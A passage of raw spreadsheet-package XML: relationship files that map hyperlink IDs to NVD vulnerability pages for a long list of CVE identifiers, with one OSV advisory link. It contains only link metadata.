Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54675" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95104" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96538" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-42002" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101002" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54674" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54708" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54710" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75600" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86530" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87969" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100750" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101007" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101008" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101009" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55157" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101073" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101188" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101909" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81375" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101292" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101901" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101903" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101906" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54160" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82383" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91043" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82323" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82380" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88805" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93348" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93355" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102004" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16513" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18413" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18414" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4556" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45562" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82348" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82376" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82379" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82386" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82928" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97335" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101905" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55160" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100751" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101878" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102276" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102278" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102281" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101916" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102243" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102266" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102267" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102271" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102272" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102273" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102334" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82375" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101012" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101015" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101066" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101067" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101280" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101281" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102245" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102248" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102249" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12267" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86330" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96326" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101091" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102335" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15952" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52748" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55096" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87114" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90925" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93538" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94286" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97023" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97024" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97685" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100392" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101898" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101907" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102010" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80357" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101895" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68497" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84292" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84394" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88058" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-456v-xq2p-r4cj" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88771" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88772" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88773" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88775" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88776" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88777" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100886" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101001" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101090" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101045" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100872" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100896" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101060" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101049" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101050" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101064" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100869" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100908" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88778" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101032" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88774" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101059" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101085" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101086" TargetMode="External" Id="rId173" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet8.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82377" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82384" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88804" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19759" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81867" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100752" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101108" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101110" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102422" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101260" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101261" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101894" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102268" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101860" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12264" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12265" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12268" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12269" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78424" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87741" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88808" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100371" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54675" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96538" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-42002" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54708" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54710" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101909" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81375" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101901" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101903" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101906" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54160" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91043" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82323" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82380" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88805" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93348" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82348" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82928" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101905" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55160" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100751" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101878" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102276" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102278" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102281" 